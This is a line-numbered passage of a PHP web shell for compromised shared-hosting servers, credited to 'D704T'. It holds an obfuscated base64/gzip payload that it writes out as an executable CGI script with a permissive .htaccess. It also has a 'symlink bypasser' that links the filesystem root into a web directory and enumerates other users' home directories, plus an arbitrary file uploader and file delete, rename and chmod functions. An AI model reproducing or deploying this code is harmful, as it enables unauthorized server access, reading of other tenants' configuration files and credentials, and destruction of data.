1448foreach($users as $user)
1449{
1450$str=explode("\n",$user);
1451echo $str[0]."\n";
1452}
1453
1454?></textarea>
1455<?php
1456}
1457
1458
1459
1460?>
1461<form method=post>
1462<font size=5 color=white> <input type=submit name=perl value="Configuration File Killer"> </font></form>
1463<p>
1464<?php
1465if(isset($_POST['perl']))
1466{
1467 error_reporting(0);
1468
1469$da='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';
1470$decryp=gzinflate(base64_decode($da));
1471mkdir('perl', 0777);
1472$hope = fopen("perl/.htaccess", 'w');
1473$hcon= "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .root\nAddHandler cgi-script .root\nAddHandler cgi-script .root";
1474fwrite ( $hope, $hcon ) ;
1475$pelfile = fopen("perl/in.root" ,"w");
1476fwrite ($pelfile,$decryp);
1477 chmod("perl/in.root",0755);
1478 echo "<iframe src=perl/in.root width=50% height=70% ></iframe><br><br> ";
1479 echo "<font size=4>check in this directory for configuration files once you have done with this script<br><a href=perl/><u>Open Configuration File</u></a></font>";
1480
1481}
1482?>
1483<form method=post>
1484<font color=white size=2>Symlink bypasser ( Use this tools if Cant read /etc/named ) </font><p>
1485<input type=submit name="ms" value="Let's play with us " /></form>
1486<?php
1487 if(isset($_POST['ms']))
1488 {
1489 error_reporting(0);
1490 $cmd="ls /var/named";
1491 $r=shell_exec($cmd);
1492
1493
1494 mkdir('SymSec',0777);
1495
1496
1497
1498
1499$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1500$f = fopen('SymSec/.htaccess','w');
1501
1502$security = symlink("/","SymSec/root");
1503
1504fwrite($f , $rr);
1505 ?><form method=post><textarea rows=1 cols=1 name=web><?php echo $r;?></textarea><br><input type=submit name=w value="Start the game " />
1506</form>
1507<?php
1508
1509 }
1510
1511error_reporting(0);
1512$webs=explode("\n",$_POST['web']);
1513if(isset($_POST['w']))
1514{
1515$webs=explode("\n",$_POST['web']);
1516echo "<table width=40% align=center border=1>
1517<tr><td align=center>Websites</td><td align=center>usernames</td><td>symlink</td></tr>";
1518foreach($webs as $f)
1519{
1520 $str=substr_replace($f,"",-4);
1521
1522
1523$user = posix_getpwuid(@fileowner("/etc/valiases/".$str));
1524
1525echo "<table border=1 width=40%><tr><td align=center><font color=red>".$str."</font></td><td align=center><font color=white>".$user['name']."</td><td><a href=SymSec/root/home/".$user['name']."/public_html/>Open the Symlink file</a></tr></table>"; flush();
1526
1527
1528
1529
1530
1531 }
1532
1533 }
1534
1535
1536?>
1537<?php
1538echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
1539echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
1540if( $_POST['_upl'] == "Upload" ) {
1541if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success ^_^ <b><br><br>'; }
1542else { echo '<b>Upload Failed :( </b><br><br>'; }
1543}
1544?>
1545<?php
1546//Make directory stuff
1547if (isset($_POST['do_create_dir'])) {
1548 $cdir = $_POST['create_dir'];
1549 if (is_dir($cdir)) {
1550 success("dir_exists", $cdir);
1551 } else {
1552 if (mkdir($cdir, 0777)) {
1553 success("createdir", $cdir);
1554 } else {
1555 error("Directory was not created!");
1556 }
1557 }
1558}
1559//Make file stuff
1560if (isset($_POST['do_create_file'])) {
1561 $cfile = $_POST['create_file'];
1562 if (file_exists($cfile)) {
1563 success("file_exists", $cfile);
1564 } else {
1565 if (fopen($cfile, "w+")) {
1566 success("file_created", $cfile);
1567 } else {
1568 error("File was not created");
1569 }
1570 }
1571}
1572//Go directory
1573if (isset($_POST['do_go_dir'])) {
1574 $godir = $_POST['go_dir'];
1575 echo "<script>window.location = 'http://$domain$script?path=$godir'</script>";
1576}
1577//Go Edit file
1578if (isset($_POST['do_go_edit'])) {
1579 $gefile = $_POST['go_edit_file'];
1580 if (file_exists($gefile)) {
1581 header("Location: http://$domain$script?editfile=$gefile");
1582 } else {
1583 error("File does not exist!");
1584 }
1585}
1586//Upload File
1587if (isset($_POST['do_upload_file'])) {
1588 $udir = $_POST['upload_location'];
1589 $uname = $_FILES['upload_file']['name'];
1590 $both = "$udir$uname";
1591 if (file_exists($both)) {
1592 success("file_exists", $both);
1593 } else {
1594 switch ($_FILES['upload_file']['error']) {
1595 case 0:
1596 if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $udir . '/' . $uname)) {
1597 success("file_uploaded");
1598 } else {
1599 error("Failed To Upload File!");
1600 }
1601 }
1602 }
1603}
1604//Kill Shell
1605if (isset($_GET['kill'])) {
1606 if (unlink("$dir/$script2")) {
1607 success("shell_killed");
1608 } else {
1609 error("Failed to kill shell!");
1610 }
1611}
1612//Delete Directory
1613if (isset($_GET['deldir'])) {
1614 $deldir = $_GET['deldir'];
1615 $redir = dirname($deldir);
1616 if (rmdir($deldir)) {
1617 success("dir_del", rtrim($redir, '/'));
1618 } else {
1619 error("Failed to delete directory!");
1620 }
1621}
1622//Rename Directory
1623if (isset($_GET['rendir'])) {
1624 $rendir = $_GET['rendir'];
1625 $dend = $_GET['old'];
1626 echo "<center>
1627<form action='' method='post'>
1628<input type='text' class='text' name='new_dir_name' value='$dend'>
1629<input type='submit' name='do_rename_dir' value='Rename'>
1630</center>";
1631}
1632if (isset($_POST['do_rename_dir'])) {
1633 $newdir = $_POST['new_dir_name'];
1634 $rendir = $_GET['rendir'];
1635 $dend = $_GET['old'];
1636 if (rename("$rendir/$dend", "$rendir/$newdir")) {
1637 success("dir_renamed", $rendir);
1638 } else {
1639 error("Directory was not renamed!");
1640 }
1641}
1642//Delete file
1643if (isset($_GET['delfile'])) {
1644 $delfile = $_GET['delfile'];
1645 $redir = dirname($delfile);
1646 if (unlink($delfile)) {
1647 success("filedelete", rtrim($redir, '/'));
1648 } else {
1649 error("Failed to delete file!");
1650 }
1651}
1652//Rename File
1653if (isset($_GET['renfile'])) {
1654 $renfile = $_GET['renfile'];
1655 $fend = $_GET['old'];
1656 echo "<center>
1657<form action='' method='post'>
1658<input type='text' class='text' name='new_file_name' value='$fend'>
1659<input type='submit' name='do_rename_file' value='Rename'>
1660</center>";
1661}
1662if (isset($_POST['do_rename_file'])) {
1663 $newfile = $_POST['new_file_name'];
1664 $renfile = $_GET['renfile'];
1665 $fend = $_GET['old'];
1666 if (rename("$renfile/$fend", "$renfile/$newfile")) {
1667 success("file_renamed", $renfile);
1668 } else {
1669 error("File was not renamed!");
1670 }
1671}
1672//Mass Files Stuff
1673if (isset($_POST['mass_files'])) {
1674 $action = $_POST['mass_action'];
1675 $chmodvalue = $_POST['chmod_value'];
1676 $box = $_POST['delbox'];
1677 if ($action == "Delete") {
1678 foreach ($box as $b) {
1679 if (is_dir($b)) {
1680 if (rmdir($b)) {
1681 echo "<font color='green'>Deleted Directory: $b</font><br>";
1682 } else {
1683 echo "<font color='red'>Failed To Delete Directory: $b</font><br>";
1684 }
1685 } else {
1686 if (unlink($b)) {
1687 echo "<font color='green'>Deleted File: $b</font><br>";
1688 } else {
1689 echo "<font color='red'>Failed To Delete file: $b</font><br>";
1690 }
1691 }
1692 }
1693 }
1694 if ($action == "chmod") {
1695 foreach ($box as $b) {
1696 if (is_dir($b)) {
1697 if (chmod($b, $chmodvalue)) {
1698 echo "<font color='green'>Changed Permissions Of Directory: $b</font><br>";
1699 } else {
1700 echo "<font color='red'>Failed To Change Permissions Of Directory: $b</font><br>";
1701 }
1702 } else {
1703 if (chmod($b, $chmodvalue)) {
1704 echo "<font color='green'>Changed Persmissions Of File: $b</font><br>";
1705 } else {
1706 echo "<font color='red'>Failed To Change Permissions Of File: $b</font><br>";
1707 }
1708 }
1709 }
1710 }
1711}
1712?>
1713<footer>
1714<p>Power by : <a href="fb.com/profil.php">D704T</a></p>
1715</footer>
1716</body>
1717</html>